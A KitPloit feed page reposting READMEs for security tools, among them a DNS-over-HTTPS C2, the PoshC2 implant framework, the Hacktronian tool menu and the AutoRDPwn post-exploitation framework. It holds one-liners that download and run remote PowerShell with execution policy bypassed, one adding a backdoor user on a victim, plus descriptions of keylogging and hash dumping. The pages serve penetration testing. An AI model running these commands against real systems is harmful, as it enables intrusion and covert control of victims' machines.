Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5844 articles
Browse latest View live

Truegaze - Static Analysis Tool For Android/iOS Apps Focusing On Security Issues Outside The Source Code

$
0
0

A static analysis tool for Android and iOS applications focusing on security issues outside the source code such as resource strings, third party libraries and configuration files.

Requirements
Python 3 is required and you can find all required modules in the requirements.txt file. Only tested on Python 3.7 but should work on other 3.x releases. No plans to 2.x support at this time.

Installation
You can install this via PIP as follows:
pip install truegaze
truegaze
To download and run manually, do the following:
git clone https://github.com/nightwatchcybersecurity/truegaze.git
cd truegaze
pip -r requirements.txt
python -m truegaze.cli

How to use
To list modules:
truegaze list
To scan an application:
truegaze scan test.apk
truegaze scan test.ipa

Sample output
Listing modules:
user@localhost:~/$ truegaze list
Total active plugins: 1
+----------------+------------------------------------------+---------+------+
| Name | Description | Android | iOS |
+----------------+------------------------------------------+---------+------+
| AdobeMobileSdk | Detection of incorrect SSL configuration | True | True |
| | in the Adobe Mobile SDK | | |
+----------------+------------------------------------------+---------+------+
Scanning an application:
user@localhost:~/$ truegaze scan ~/test.ipa
Identified as an iOS application via a manifest located at: Payload/IPAPatch-DummyApp.app/Info.plist
Scanning using the "AdobeMobileSdk" plugin
-- Found 1 configuration file(s)
-- Scanning "Payload/IPAPatch-DummyApp.app/Base.lproj/ADBMobileConfig.json'
---- FOUND: The ["analytics"]["ssl"] setting is missing or false - SSL is not being used
---- FOUND: The ["remotes"]["analytics.poi"] URL doesn't use SSL: http://assets.example.com/c234243g4g4rg.json
---- FOUND: The ["remotes"]["messages"] URL doesn't use SSL: http://assets.example.com/b34343443egerg.json
---- FOUND: A "templateurl" in ["messages"]["payload"] doesn't use SSL: http://my.server.com/?user={user.name}&zip={user.zip}&c16={%sdkver%}&c27=cln,{a.PrevSessionLength}
---- FOUND: A "templateurl" in ["messages"]["payload"] doesn't use SSL: http://my.43434server.com/?user={user.name}&zip={user.zip}&c16={%sdkver%}&c27=cl n,{a.PrevSessionLength}
Done!
Display installed version:
user@localhost:~/$ truegaze version
Current version: v0.2

Structure
The application is command line and will consist of several modules that check for various vulnerabilities. Each module does its own scanning, and all results get printed to command line.

Reporting bugs and feature requests
Please use the GitHub issue tracker to report issues or suggest features: https://github.com/nightwatchcybersecurity/truegaze
You can also send emai to research /at/ nightwatchcybersecurity [dot] com

Wishlist
  • More unit test coverage for code that interacts with Click
  • Ability to extract additional files from online source
  • Ability to check if a particular vulnerability is exploitable
  • Ability to produce JSON or XML output that can feed into other tools
  • More modules!

About the name
"True Gaze" or "Истинное Зрение" is a magical spell that reveals the invisible (from the book "Last Watch" by Sergei Lukyanenko)



goDoH - A DNS-over-HTTPS C2

$
0
0

godoh is a proof of concept Command and Control framework, written in Golang, that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google, Cloudflare but also contains the ability to use traditional DNS.

Installation
All you would need are the godoh binaries themselves. Binaries are available for download from the releases page as part of tagged releases.
To build godoh from source, follow the following steps:
  • Ensure you have dep installed (go get -v -u github.com/golang/dep/cmd/dep)
  • Clone this repository to your $GOPATH's src/ directory so that it is in sensepost/godoh
  • Run dep ensure to resolve dependencies
  • Run make key to generate a unique encryption key to use for communication
  • Use the go build tools, or run make to build the binaries in the build/ directory

usage
$ godoh -h  A DNS (over-HTTPS) C2      Version: dev      By @leonjza from @sensepost    Usage:    godoh [command]    Usage:    godoh [command]    Available Commands:    agent       Connect as an Agent to the DoH C2    c2          Starts the godoh C2 server    help        Help about any command    receive     Receive a file via DoH    send        Send a file via DoH    test        Test DNS communications    Flags:    -d, --domain string     DNS Domain to use. (ie: example.com)    -h, --help              help for godoh    -p, --provider string   Preferred DNS provider to use. [possible: google, cloudflare, raw] (default "google")    Use "godoh [command] --help" for more information about a command.  


PEpper - An Open Source Script To Perform Malware Static Analysis On Portable Executable

$
0
0

An open source tool to perform malware static analysis on Portable Executable

Installation
eva@paradise:~$ git clone https://github.com/Th3Hurrican3/PEpper/
eva@paradise:~$ cd PEpper
eva@paradise:~$ pip3 install -r requirements.txt
eva@paradise:~$ python3 pepper.py ./malware_dir


Screenshot





CSV output


Feature extracted
  • Suspicious entropy ratio
  • Suspicious name ratio
  • Suspicious code size
  • Suspicious debugging time-stamp
  • Number of export
  • Number of anti-debugging calls
  • Number of virtual-machine detection calls
  • Number of suspicious API calls
  • Number of suspicious strings
  • Number of YARA rules matches
  • Number of URL found
  • Number of IP found
  • Cookie on the stack (GS) support
  • Control Flow Guard (CFG) support
  • Data Execution Prevention (DEP) support
  • Address Space Layout Randomization (ASLR) support
  • Structured Exception Handling (SEH) support
  • Thread Local Storage (TLS) support
  • Presence of manifest
  • Presence of version
  • Presence of digital certificate
  • Packer detection
  • VirusTotal database detection
  • Import hash

Notes
  • Can be run on single or multiple PE (placed inside a directory)
  • Output will be saved (in the same directory of pepper.py) as output.csv
  • To use VirusTotal scan, add your private key in the module called "virustotal.py" (Internet connection required)

Credits
Many thanks to those who indirectly helped me in this work, specially:


Applepie - A Hypervisor For Fuzzing Built With WHVP And Bochs

$
0
0

Hello! Welcome to applepie! This is a tool designed for fuzzing, introspection, and finding bugs! This is a hypervisor using the Windows Hypervisor Platform API present in recent versions of Windows (specifically this was developed and tested on Windows 10 17763). Bochs is used for providing deep introspection and device emulation.
The Windows Hypervisor Platform API (WHVP) is an API set for accessing Hyper-V's hypervisor abilities. This API makes it easy for us to implement a virtual machine all in user-space without any special drivers or permissions needed.

Recent Feature Demo


Binary Coverage Example


What is this for?
This is a tool designed for fuzzing and introspection during security research. By using a hypervisor common fuzzing techniques can be applied to any target, kernel or userland. This environment allows fuzzing of whole systems without a need for source of the target. At the hypervisor level code coverage can be gathered, and if needed Bochs emulation can be used to provide arbitrary introspection in an emulation environment. This coverage information can be used to figure out the effectiveness of the fuzz cases. A fuzz case that caused an increase in coverage can be saved as it was an interesting case. This input can be used later, built on by new corruptions.
Snapshot fuzzing is the primary use of this tool. Where you take a snapshot of a system in a certain state, and save it off. This snapshot can then be loaded up for fuzzing, where a fuzz case is injected, and it's resumed. Since the VM can be reset very cheaply, the VM can be reset often. If it takes Word 5 seconds to boot, but you can snapshot it right as it reads your file, you can cut the fuzz case down to only what is relevant to an input. This allows for a very tight loop of fuzzing without needing to have access to source. Since the VM's are entirely separate systems, many can be run in parallel to allow scaling to all cores.
Currently this tool only supports gathering code coverage, dynamic symbol downloading for Windows, and symbol/module parsing for Windows targets as well. Adding fuzzing support will be quite soon.

Development cycle
Given I've written almost all the features here before (coverage, fuzzing, fast resets, etc). I expect this project should pretty quickly become ready for fuzzing, unless I get distracted :D
I'm aiming for end-of-January for coverage (done!), feedback, module listings (done!), process lists, fast resets, and symbol support (done!). Which would make it a very capable fuzzer.

OS Support
The main supported target is modern Windows 10. Windows targets have downloading of symbols from the symbol store. This allows for symbolic coverage in Windows targets out of the box. However, the code is written in a way that Linux enlightenment can easily be added.
Without any enlightment, any OS that boots can still be fuzzed and basic coverage can be gathered.
Before reporting OS support issues please validate that the issue is in the hypervisor/changes to Bochs by trying to boot your target using standard prebuilt Bochs with no hypervisor. Bochs is not commonly used and can frequently have breaking bugs for even common things like booting Linux. Especially with the rapid internal changes to CPUID/MSR usages with Spectre/Meltdown mitigations going into OSes.

Issues
See the issues page on Github for a list of issues. I've seeded it with a few already. Some of these need to be addressed quickly before fuzzing development starts.

Building

Build Prereqs
To build this you need a few things:
  • Recently updated MSVC compiler (Visual Studio 2017)
  • Nightly Rust (https://rustup.rs/ , must be nightly)
  • Python (I used 3 but 2 should work too)
  • 64-bit cygwin with autoconf and GNU make packages installed
  • Hyper-V installed and a recent build of Windows 10

MSVC
Install Visual Studio 2017 and make sure it's updated. We're using some bleeding edge APIs, headers, and libraries here.
I was using cl.exe version: Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27025.1 for x64 And SDK version 10.0.17763.0

Nightly Rust
Install Rust via https://rustup.rs/. I used rustc 1.32.0-nightly (b3af09205 2018-12-04)
Make sure you install the x86_64-pc-windows-msvc toolchain as only 64-bit is supported for this project.
Make sure cargo is in your path. This should be the default.

Python
Go grab python https://www.python.org/ and make sure it's in your PATH such that python can be invoked.

Cygwin
Install 64-bit Cygwin (https://www.cygwin.com/setup-x86_64.exe) specifically to C:\cygwin64. When installing Cygwin make sure you install the autoconf and make packages.

Hyper-V
Go into "Turn Windows features on or off" and tick the checkbox next to "Hyper-V" and "Windows Hypervisor Platform". This requires of course that your computer supports Hyper-V.

Step-by-step build process
This install process guide was verified on the following:
Clean install of Windows 10, Build 17763
rustc 1.33.0-nightly (8e2063d02 2019-01-07)
Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27025.1 for x64
Visual Studio Community 2017 version 15.9.4
applepie commit `f84c084feb487e2e7f31f9052a4ab0addd2c4cf9`
Python 3.7.2 x64
git version 2.20.1.windows.1
  • Make sure Windows 10 is fully up to date
    • We use some bleeding edge features with WHVP and only latest Windows 10 is tested
  • In "Turn Windows features on or off"
    • Tick "Hyper-V"
    • Tick "Windows Hypervisor Platform"
    • Click ok to install and reboot

  • Install VS Community 2017 and updated
    • Desktop development with C++

  • Install Rust nightly for x86_64-pc-windows-msvc


  • Install Git
    • Configure git to checkout as-is, commit unix-style
    • If git converts on checkout the ./configure script will fail for Bochs due to CRLF line endings
    • This is core.autocrlf=input
    • You can also use checkout as-is, commit as-is
    • This is core.autocrlf=false
  • Install Cygwin x64 via setup-x86_64.exe
    • Install to "C:\cygwin64"
    • Install autoconf package (autoconf package)
    • Install GNU make (make package)
  • Install Python
    • I installed Python 3 x64 and added to PATH
    • Python 2 and 32-bit versions should be fine, we just use Python for our build script
  • Open a "x64 Native Tools Command Prompt for VS 2017"
  • Checkout applepie via git clone https://github.com/gamozolabs/applepie
  • cd into applepie
  • Run python build.py
    • This will first check for some basic system requirements
    • It will build the Rust bochservisor DLL
    • It will then configure Bochs via autoconf
    • It will then build Bochs with GNU make from Cygwin
This initial build process may take about 2 minutes, on a modern machine it's likely 20-30 seconds.

Actually Building
Just run python build.py from the root directory of this project. It should check for sanity of the environment and everything should "just work".

Cleaning
Run python build.py clean to clean Bochs and Rust binaries.
Run python build.py deepclean to completely remove all Bochs and Rust binaries, it also removes all the configuration for Bochs. Use this if you reconfigure Bochs in some way.

Usage
Read up on Bochs configuration to figure out how to set up your environment. We have a few requirements, like sync=none, ips=1000000, and currently single processor support only. These are enforced inside of the code itself to make sure you don't shoot yourself in the foot.
Use the included bochservisor_test\bochsrc.bxrc and bochservisor_test_real\bochsrc.bxrc configurations as examples. bochservisor_test_real is likely the most up to date config you should look at as reference.

Coverage
Windows targets have module list enlightenment, which allows us to see the listings for all the modules in the context we are running in. With this we can convert the instruction addresses to module + offset. This module + offset helps keep coverage information between fuzz cases where ASLR state changes. It also allows for the module to be colored in a tool like IDA to visually see what code has been hit.
For Windows targets, symbols will be dynamically downloaded from the symbol store using your _NT_SYMBOL_PATH and using symchk. Without symchk in the path it will silently fail. With symbols a nice human-readable version of coverage can be saved for viewing. Further, with private symbols the coverage can be converted to source:line such that source code can be colored.

Tests
Okay there aren't really tests, but there's bochservisor_test which is a tiny OS that just verifies that everything boots with the hypervisor.
There's then bochservisor_test_real which is a configuration I use for things like Windows/Linux. This is the one that will probably get updated most frequently.

Architecture

Basics
This codebase introduces a small amount of code to Bochs to allow modular access to CPU context, guest physical to their backing memory, and stepping both device and CPU state.
The main code you want to look at is in lib.rs in the bochservisor Rust project.

CPU Loop
In the main CPU loop of Bochs we instead LoadLibrary() to load the bochservisor DLL. This DLL exports one routine which is the Rust CPU loop which will be invoked.
Bochs will pass a structure to this bochs_cpu_loop routine which will contain function pointers to get information from Bochs and to step the device and CPU state in it.

MMIO / I/O
When MMIO or I/O occurs, the hypervisor will exit with a memory fault or an I/O instruction fault. While WHVP does provide an emulation API it's really lacking and not sufficient.
Rather we use Bochs which is already there and step through a few instructions. By keeping the hypervisor CPU state in sync with Bochs we can dynamically switch between hypervisor and emulation at any time (or at least we should be able to).
This means that the full hypervisor state is always in sync with Bochs and thus things like Bochs snapshots should work as normal and could be booted without the hypervisor (except maybe some CPUID state which needs to be stored in the snapshot info).
When MMIO or I/O occurs we run a certain number of instructions under emulation rather than just emulating one. Due to the API costs of entering and exiting the hypervisor, and the likelihood that similar MMIO operations occur next to others, we step a few instructions. This allows use to reduce the overhead of the API and reduces the VMEXIT frequency. This is a tunable number but what is in the codebase is likely there for a reason.

Interrupts
Interrupts we handle in a really interesting way. Rather than scheduling interrupts to be delivered to the hypervisor we handle all interrupts in Bochs emulation itself. Things like exceptions that happen inside of the hypervisor entirely of course are not handled by Bochs.
This also gives us features that WHVP doesn't support, like SMIs (for SMM). Bochs's BIOS uses SMM by default and without SMI support a custom BIOS needs to be built. I did this in my first iteration of this... do not recommend.

Future
This project is designed for fuzzing, however it's so new (only a few days old) that it has none of these features.
Some of the first things to come will be:

Evaluate threading
We could potentially have Bochs device stuff running in one thread in a loop in real-time, and another thread running the hypervisor. Async events would be communicated via IPC and would allow for the devices to be updated while execution is in the guest.
Currently everything happens in one thread which means the hypervisor must exit on an interval to make sure we can step devices. It's as if we wrote our own scheduler.
This might be a bit faster, but it also increases complexity and adds the potential for race issues. It's hard to say if this will ever happen.

Code coverage
I'm not sure which method I'll use to gather code coverage, but there will be at least a few options. Spanning from accurate, to fast, etc. All these coverage mechanisms will be system level and will not require source or symbols of targets.

Guest enlightenment
Parsing of OS structures to get primitive information such as process listings, module lists, etc. This would then be used to query PDBs to get symbol information.

Crash reporting
Reporting crashes in some meaningful way. Ideally minidumps would be nice as they could be loaded up and processed in WinDbg. This might be fairly easy as DMPs are just physical memory and processor context, which we already have.

Crash deduping / root causing
I've got some fun techniques for root causing bugs which have been historically successful. I plan to bring those here.

Fast resets
By tracking dirty pages and restoring only modified things we should be able to reset VMs very quickly. This gives us the ability to fuzz at maximum speeds on all cores of a system target. This is similar to what I did in falkervisor so it's already thought out and designed. It just needs to be ported here.

falkervisor mode
Extremely fast fuzzing that cancels execution when MMIO or I/O occurs. This allows all the CPU time to be spent in the hypervisor and no emulation time. This has a downside of not supporting things like disk I/O during a fuzz case, but it's nice.

Philosophy
Some of the core concepts of this project are absolute minimum modifications to Bochs. This allows us to keep the Bochs portion of this repo up to date.
The goal is to also move as much code into Rust and dlls as possible to make the system much more modular and safe. This will hopefully reduce the chances of making silly corruption bugs in the hypervisor itself, causing invalid fuzz results.
Currently the hypervisor is a DLL and can be swapped out without changes to Bochs (unless the FFI API changes).
Further changes to Bochs itself must be documented clearly, and I'll be making a document for that shortly to track the changes to Bochs which must be ported and re-evaluated with Bochs updates.


Pyshark - Python Wrapper For Tshark, Allowing Python Packet Parsing Using Wireshark Dissectors

$
0
0

Python wrapper for tshark, allowing python packet parsing using wireshark dissectors.
Extended documentation: http://kiminewt.github.io/pyshark
Python2 deprecation - This package no longer supports Python2. If you wish to still use it in Python2, you can:
Looking for contributors - for various reasons I have a hard time finding time to maintain and enhance the package at the moment. Any pull-requests will be reviewed and if any one is interested and is suitable, I will be happy to include them in the project. Feel free to mail me at dorgreen1 at gmail.
There are quite a few python packet parsing modules, this one is different because it doesn't actually parse any packets, it simply uses tshark's (wireshark command-line utility) ability to export XMLs to use its parsing.
This package allows parsing from a capture file or a live capture, using all wireshark dissectors you have installed. Tested on windows/linux.

Installation

All Platforms
Simply run the following to install the latest from pypi
pip install pyshark
Or install from the git repository:
git clone https://github.com/KimiNewt/pyshark.git
cd pyshark/src
python setup.py install

Mac OS X
You may have to install libxml which can be unexpected. If you receive an error from clang or an error message about libxml, run the following:
xcode-select --install
pip install libxml
You will probably have to accept a EULA for XCode so be ready to click an "Accept" dialog in the GUI.

Usage

Reading from a capture file:
>>> import pyshark
>>> cap = pyshark.FileCapture('/tmp/mycapture.cap')
>>> cap
<FileCapture /tmp/mycapture.cap (589 packets)>
>>> print cap[0]
Packet (Length: 698)
Layer ETH:
Destination: BLANKED
Source: BLANKED
Type: IP (0x0800)
Layer IP:
Version: 4
Header Length: 20 bytes
Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
Total Length: 684
Identification: 0x254f (9551)
Flags: 0x00
Fragment offset: 0
Time to live: 1
Protocol: UDP (17)
Header checksum: 0xe148 [correct]
Source: BLANKED
Destination: BLANKED
...

Other options
  • param keep_packets: Whether to keep packets after reading them via next(). Used to conserve memory when reading large caps.
  • param input_file: Either a path or a file-like object containing either a packet capture file (PCAP, PCAP-NG..) or a TShark xml.
  • param display_filter: A display (wireshark) filter to apply on the cap before reading it.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK.
  • param tshark_path: Path of the tshark binary

Reading from a live interface:
>>> capture = pyshark.LiveCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
print 'Just arrived:', packet

Other options
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live interface using a ring buffer
>>> capture = pyshark.LiveRingCapture(interface='eth0')
>>> capture.sniff(timeout=50)
>>> capture
<LiveCapture (5 packets)>
>>> capture[3]
<UDP/HTTP Packet>

for packet in capture.sniff_continuously(packet_count=5):
print 'Just arrived:', packet

Other options
  • param ring_file_size: Size of the ring file in kB, default is 1024
  • param num_ring_files: Number of ring files to keep, default is 1
  • param ring_file_name: Name of the ring file, default is /tmp/pyshark.pcap
  • param interface: Name of the interface to sniff on. If not given, takes the first available.
  • param bpf_filter: BPF filter to use on packets.
  • param display_filter: Display (wireshark) filter to use.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary
  • param output_file: Additionally save captured packets to this file.

Reading from a live remote interface:
>>> capture = pyshark.RemoteCapture('192.168.1.101', 'eth0')
>>> capture.sniff(timeout=50)
>>> capture

Other options
  • param remote_host: The remote host to capture on (IP or hostname). Should be running rpcapd.
  • param remote_interface: The remote interface on the remote machine to capture on. Note that on windows it is not the device display name but the true interface name (i.e. \Device\NPF_..).
  • param remote_port: The remote port the rpcapd service is listening on
  • param bpf_filter: A BPF (tcpdump) filter to apply on the cap before reading.
  • param only_summaries: Only produce packet summaries, much faster but includes very little information
  • param disable_protocol: Disable detection of a protocol (tshark > version 2)
  • param decryption_key: Key used to encrypt and decrypt captured traffic.
  • param encryption_type: Standard of encryption used in captured traffic (must be either 'WEP', 'WPA-PWD', or 'WPA-PWK'. Defaults to WPA-PWK).
  • param tshark_path: Path of the tshark binary

Accessing packet data:
Data can be accessed in multiple ways. Packets are divided into layers, first you have to reach the appropriate layer and then you can select your field.
All of the following work:
>>> packet['ip'].dst
192.168.0.1
>>> packet.ip.src
192.168.0.100
>>> packet[2].src
192.168.0.100
To test whether a layer is in a packet, you can use its name:
>>> 'IP' in packet
True
To see all possible field names, use the packet.layer.field_names attribute (i.e. packet.ip.field_names) or the autocomplete function on your interpreter.
You can also get the original binary data of a field, or a pretty description of it:
>>> p.ip.addr.showname
Source or Destination Address: 10.0.0.10 (10.0.0.10)
# And some new attributes as well:
>>> p.ip.addr.int_value
167772170
>>> p.ip.addr.binary_value
'\n\x00\x00\n'

Decrypting packet captures
Pyshark supports automatic decryption of traces using the WEP, WPA-PWD, and WPA-PSK standards (WPA-PWD is the default).
>>> cap1 = pyshark.FileCapture('/tmp/capture1.cap', decryption_key='password')
>>> cap2 = pyshark.LiveCapture(interface='wi0', decryption_key='password', encryption_type='wpa-psk')
A tuple of supported encryption standards, SUPPORTED_ENCRYPTION_STANDARDS, exists in each capture class.
>>> pyshark.FileCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')
>>> pyshark.LiveCapture.SUPPORTED_ENCRYPTION_STANDARDS
('wep', 'wpa-pwd', 'wpa-psk')


Hacktronian - All In One Hacking Tool For Linux & Android

$
0
0

***Pentesing Tools That All Hacker Needs.***

HACKTRONIAN Menu :
  • Information Gathering
  • Password Attacks
  • Wireless Testing
  • Exploitation Tools
  • Sniffing & Spoofing
  • Web Hacking
  • Private Web Hacking
  • Post Exploitation
  • Install The HACKTRONIAN

Information Gathering:
  • Nmap
  • Setoolkit
  • Port Scanning
  • Host To IP
  • wordpress user
  • CMS scanner
  • XSStrike
  • Dork - Google Dorks Passive Vulnerability Auditor
  • Scan A server's Users
  • Crips

Password Attacks:
  • Cupp
  • Ncrack

Wireless Testing:
  • reaver
  • pixiewps
  • Fluxion

Exploitation Tools:
  • ATSCAN
  • sqlmap
  • Shellnoob
  • commix
  • FTP Auto Bypass
  • jboss-autopwn

Sniffing & Spoofing:
  • Setoolkit
  • SSLtrip
  • pyPISHER
  • SMTP Mailer

Web Hacking:
  • Drupal Hacking
  • Inurlbr
  • Wordpress & Joomla Scanner
  • Gravity Form Scanner
  • File Upload Checker
  • Wordpress Exploit Scanner
  • Wordpress Plugins Scanner
  • Shell and Directory Finder
  • Joomla! 1.5 - 3.4.5 remote code execution
  • Vbulletin 5.X remote code execution
  • BruteX - Automatically brute force all services running on a target
  • Arachni - Web Application Security Scanner Framework

Private Web Hacking:
  • Get all websites
  • Get joomla websites
  • Get wordpress websites
  • Control Panel Finder
  • Zip Files Finder
  • Upload File Finder
  • Get server users
  • SQli Scanner
  • Ports Scan (range of ports)
  • ports Scan (common ports)
  • Get server Info
  • Bypass Cloudflare

Post Exploitation:
  • Shell Checker
  • POET
  • Weeman

Installation in Linux:
This Tool Must Run As ROOT !!!
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
./install.sh
That's it.. you can execute tool by typing hacktronian

Installation in Android:
Open Termux
pkg install git
pkg install python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py

Video Tutorial :



PoshC2 - C2 Server and Implants

$
0
0

PoshC2 is a proxy aware C2 framework that utilises Powershell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement. Powershell was chosen as the base implant language as it provides all of the functionality and rich features without needing to introduce multiple third party libraries to the framework.
In addition to the Powershell implant, PoshC2 also has a basic dropper written purely in Python that can be used for command and control over Unix based systems such as Mac OS or Ubuntu.
The server-side component is written in Python for cross-platform portability and speed, a Powershell server component still exists and can be installed using the 'Windows Install' as shown below but will not be maintained with future updates and releases.

Linux Install Python3
Automatic install for Python3 using curl & bash
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh | bash
Manual install Python3
wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.sh
chmod +x ./Install.sh
./Install.sh

Linux Install Python2 - stable but unmaintained
Automatic install for Python2 using curl & bash
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh | bash
Manual install Python2
wget https://raw.githubusercontent.com/nettitude/PoshC2_Python/python2/Install.sh
chmod +x ./Install.sh
./Install.sh

Windows Install
Install Git and Python (and ensure Python is in the PATH), then run:
powershell -exec bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Install.ps1')"

Using older versions
You can use an older version of PoshC2 by referencing the appropriate tag. You can list the tags for the repository by issuing:
git tag --list
or viewing them online.
Then you can use the install one-liner but replace the branch name with the tag:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/<tag name>/Install.sh | bash
For example:
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2_Python/v4.8/Install.sh | bash

Offline
If you have a local clone of PoshC2 you can change the version that is in use by just checking out the version you want to use:
git reset --hard <tag name>
For example:
git reset --hard v4.8
However note that this will overwrite any local changes to files, such as Config.py and you may have to re-run the install script for that version or re-setup the environment appropriately.

Running PoshC2
  1. Edit the config file by running posh-config to open it in $EDITOR. If this variable is not set then it defaults to vim, or you can use --nano to open it in nano.
  2. Run the server using posh-server or python3 -u C2Server.py | tee -a /var/log/poshc2_server.log
  3. Others can view the log using posh-log or tail -n 5000 -f /var/log/poshc2_server.log
  4. Interact with the implants using the handler, run by using posh or python3 ImplantHandler.py

Installing as a service
Installing as a service provides multiple benefits such as being able to log to service logs, viewing with journalctl and automatically starting on reboot.
  1. Add the file in systemd (this is automatically done via the install script)
cp poshc2.service /lib/systemd/system/poshc2.service
  1. Start the service
posh-service
  1. View the log:
posh-log
  1. Or alternatively us journalctl (but note this can be rate limited)
journalctl -n 20000 -u poshc2.service -f --output cat
Note that re-running posh-service will restart the posh-service. Running posh-service will automatically start to display the log, but Ctrl-C will not stop the service only quit the log in this case posh-log can be used to re-view the log at any point. posh-stop-service can be used to stop the service.

Issues / FAQs
If you are experiencing any issues during the installation or use of PoshC2 please check the known issues below and the open issues tracking page within GitHub. If this page doesn't have what you're looking for please open a new issue and we will try to resolve the issue asap.
If you are looking for tips and tricks on PoshC2 usage and optimisation, you are welcome to join the slack channel below.

License / Terms of Use
This software should only be used for authorised testing activity and not for malicious use.
By downloading this software you are accepting the terms of use and the licensing agreement.

Documentation
We maintain PoshC2 documentation over at https://poshc2.readthedocs.io/en/latest/
Find us on #Slack - poshc2.slack.com (to request an invite send an email to labs@nettitude.com)

Known issues

Error encrypting value: object type
If you get this error after installing PoshC2 it is due to dependency clashes in the pip packages on the system.
Try creating a virtualenv in python and re-install the requirements so that the exact versions specified are in use for PoshC2. Make sure you deactivate when you've finished in this virtualenv.
For example:
pip install virtualenv
virtualenv /opt/PoshC2_Python/
source /opt/PoshC2_Python/bin/activate
pip install -r requirements.txt
python C2Server.py
Note anytime you run PoshC2 you have to reactivate the virtual environment and run it in that.
The use of a virtual environment is abstracted if you use the posh- scripts on *nix.


AutoRDPwn v5.0 - The Shadow Attack Framework

$
0
0

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on-demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements
Powershell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file

Use
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteed its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on a line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots



Credits and Acknowledgments
This framework uses the following scripts and tools:
• Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp of Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper of Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
